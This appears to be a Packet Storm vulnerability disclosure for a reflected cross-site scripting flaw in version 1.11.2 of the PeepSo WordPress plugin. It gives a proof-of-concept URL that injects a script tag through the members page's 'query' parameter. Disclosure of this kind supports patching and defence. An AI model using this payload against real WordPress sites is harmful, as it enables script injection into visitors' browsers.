WordPress PeepSo 1.11.2 Cross Site Scripting

2018-11-12T00:00:00
ID PACKETSTORM:150267
Type packetstorm
Reporter Socket_0x03
Modified 2018-11-12T00:00:00

Description

                                        
                                            `  
  
===================================================================================  
PeepSo v1.11.2 (WordPress Plugin) - Cross-Site Scripting Vulnerability in Members"   
===================================================================================  
  
  
____________________________________________________________________________________  
  
  
# Exploit Title: PeepSo v1.11.2 (WordPress Plugin) - XSS Vulnerability in Members   
  
# Date: [11-09-2018]  
  
# Category: Webapps  
  
____________________________________________________________________________________  
  
  
# Author: Socket_0x03 (Alvaro J. Gene)  
  
# Email: Socket_0x03 (at) teraexe (dot) com  
  
# Website: www.teraexe.com   
  
____________________________________________________________________________________  
  
  
# Software Link: https://wordpress.org/plugins/peepso-core/  
  
# Plugin: PeepSo  
  
# Version: 1.11.2  
  
# File: Members   
  
# Parameter: query  
  
# Language: This application is available in English language.  
  
# Plugin Description: PeepSo is a social network plugin for WordPress with different  
kinds of features, such as user profiles, user registration, and other features.   
  
____________________________________________________________________________________  
  
  
# Cross-Site Scripting Vulnerability:   
  
http://www.website.com/wordpress/index.php/members/?blocked/&query="><script>alert(23)</script>  
  
  
`